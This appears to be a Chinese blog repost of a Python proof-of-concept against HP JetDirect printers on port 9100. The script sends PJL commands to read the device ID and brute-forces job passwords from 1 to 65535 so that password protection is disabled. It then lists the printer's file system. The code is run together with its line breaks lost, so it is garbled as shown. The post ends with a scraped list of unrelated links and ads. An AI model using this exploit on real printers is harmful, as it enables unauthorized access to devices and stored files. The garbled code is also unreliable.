hp_jetdirect 9100漏洞检测
#-*-coding=utf8-*-
import socket
import sys
def main():if len(sys.argv)<=1:print('Parameters error')returns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.settimeout(10)s.connect((sys.argv[1],9100))s.settimeout(None)# 发送读取设备ID的PJL指令s.send(('\033%-12345X@PJL INFO ID\r\n\033%-12345X\r\n').encode('UTF-8'))print(s.recv(1024).decode('UTF-8'))for i in range(1, 65536):buf = b''# 发送重置密码的PJL指令s.send(('33%-12345X@PJL \r\n@PJL JOB PASSWORD=' + str(i) + '\r\n@PJL DEFAULT PASSWORD=0 \r\n@PJL EOJ\r\n33%-12345X\r\n').encode('UTF-8'))if i%30 == 0:# 发送查询密码保护状态的PJL指令s.send(('\033%-12345X@PJL \r\n@PJL DINQUIRE PASSWORD\r\n\033%-12345X\r\n').encode('UTF-8'))while True:buf+=s.recv(1)print(buf)try:buf.index(b'\r\n\x0c')try:# 密码保护被禁用buf.index(b'DISABLED')print('password disabled ok!')# 发送查询目录的PJL指令s.send(('\033%-12345X@PJL \r\n@PJL FSDIRLIST NAME = "0:\\" ENTRY=1COUNT=99\r\n\033%-12345X\r\n').encode('UTF-8'))buf = b''while True:buf+= s.recv(1)print(buf)try:buf.index(b'\r\n\x0c')try:# 查询成功buf.index(b'ENTRY')print('PoC OK!')returnexcept ValueError:print('PoC NO!')returnexcept ValueError:continueexcept ValueError:print('password disabled faild!')finally:s.close()returnexcept ValueError:continues.close()
if __name__ == '__main__':main()
来源:http://www.secbox.cn/hacker/client/6450.html 代码太乱 仅把代码整理了下..找了2台测试,都显示socket .timed out
转载于:https://www.cnblogs.com/crac/p/5597239.html
hp_jetdirect 9100漏洞检测相关推荐
- HP officejet、PageWide打印机任意代码执行漏洞cve-2017-2741 Tenable发布漏洞检测插件...
打印机无处不在.在企业,在家里,在学校,但你在做网络安全评估的时候是否考虑过他们?你上一次更新打印机固件是什么时候?您是否知道您的打印机有公共漏洞?Tenable安全公司进行了研究,并发布了漏洞检测 ...
- 漏洞检测,流量和性能监控
漏洞检测,流量和性能监控 N essus Nessus 包括服务器和客户端两部分,可分开安装,也可以安装在一起,下是实验为安装在一台终端上 1.安装客户端,服务器 2.改变PATH,MANPATH路径 ...
- 文件包含漏洞检测工具fimap
文件包含漏洞检测工具fimap 在Web应用中,文件包含漏洞(FI)是常见的漏洞.根据包含的文件不同,它分为本地文件包含漏洞(LFI)和远程文件包含漏洞(RFL).利用该漏洞,安全人员可以获取服务器的 ...
- Wapiti一款小巧的开源安全测试漏洞检测工具
Wapiti 是一套 OpenSource 的站点漏洞检测工具,比较特殊的是,它并不依赖特征数据库,也因此扫描的速度相当快,而探测的则是一些共通性问题,或是作者所宣称的未知漏洞.Wapiti 其实是一 ...
- routersploit 路由器漏洞检测及利用框架
RouteSploit框架是一款开源的漏洞检测及利用框架,其针对的对象主要为路由器等嵌入式设备. 框架功能 RouteSploit框架主要由可用于渗透测试的多个功能模块组件组成, 1. Scanner ...
- python代码检查工具_基于Python3的漏洞检测工具 ( Python3 插件式框架 )
[TOC] Python3 漏洞检测工具 -- lance lance, a simple version of the vulnerability detection framework based ...
- 安卓拒绝服务漏洞分析及漏洞检测
"超级拒绝服务漏洞"是一个安卓通用型拒绝服务漏洞,恶意***者可能利用此漏洞让手机中的任意应用崩溃无法正常工作,几乎影响目前市面上所有的安卓APP应用. 漏洞分析: 0xr0ot和 ...
- armitage识别不了漏洞_Shiro RememberMe 漏洞检测的探索之路
前言 Shiro 是 Apache 旗下的一个用于权限管理的开源框架,提供开箱即用的身份验证.授权.密码套件和会话管理等功能.该框架在 2016 年报出了一个著名的漏洞--Shiro-550,即 Re ...
- python测验3_基于Python3的漏洞检测工具
原标题:基于Python3的漏洞检测工具 Python3 漏洞检测工具 -- lance lance, a simple version of the vulnerability detection ...
- 漏洞检测方法如何选?详解源代码与二进制SCA检测原理
摘要:本文探讨的是SCA具体的检测原理,源代码SCA检测和二进制SCA检测有哪些相同点和不同点,在进行安全审计.漏洞检测上各自又有什么样的优势和适用场景. 本文分享自华为云社区<源代码与二进制文 ...
最新文章
- Redis实战(12)订阅和发布消息
- QT的QDBusReply类的使用
- 田野中科院计算机网络信息中心,中国科学院计算机网络信息中心硕士生导师田野...
- 他在阿里的逆袭,只因为想做个“锤子”
- 堆载预压弹性变形怎样计算公式_一种风洞洞体堆载预压变形测量工艺的制作方法...
- 原子操作--sync/atomic的用法
- Windows 2003 EE升级服务错误号:0x8DDD0018 解决办法
- 作为一个Java开发者,java常用算法手册pdf
- 《左耳听风》读书笔记
- “请珍惜”震撼心灵的感动;当我们老了,还能一起真三么?
- 库存盘点遗失设备寻找中的个人收获
- vue cli js css压缩方案
- android app文件夹,android app文件目录结构
- 360做专业手机电商平台还是有搞头
- 重要更新|Amazon S3 和 CloudFront 已迁移至 Amazon Trust Services
- 【JavaEE】进入Web开发的世界-HTML
- 为啥在VS中使用scanf函数会有警告呢?如何解决此问题?(如何添加#define _CRT_SECURE_NO_WARNINGS 1)
- oracle数据库新建表增加表序列,设置id自增
- 一家之言——智慧城市“十三五”建设着眼点
- 挖个坑 - 魔法画图工具的设计
热门文章
- 支持自动识别快递公司批量查询物流、一键导出
- 程序开发里面的profile 是什么意思? (用户配置文件)
- 小度独立融资,百度上演“大象跳舞”
- android自定义秒表,Android:一个简单的秒表实现
- Ubuntu解压安装包及make命令相关操作(针对make: *** [btest] Error 127以及make: *** [btest] Error 1)
- 大学计算机教师招聘试讲什么,应聘高校教师面试,试讲注意事项
- 使用Excel时计算剩余时间
- R如何读取csv文件
- 电信光纤猫虚拟服务器设置方法,电信光纤猫与无线路由器连接的设置方法
- CleanMyMac X2023最新版安装图文详解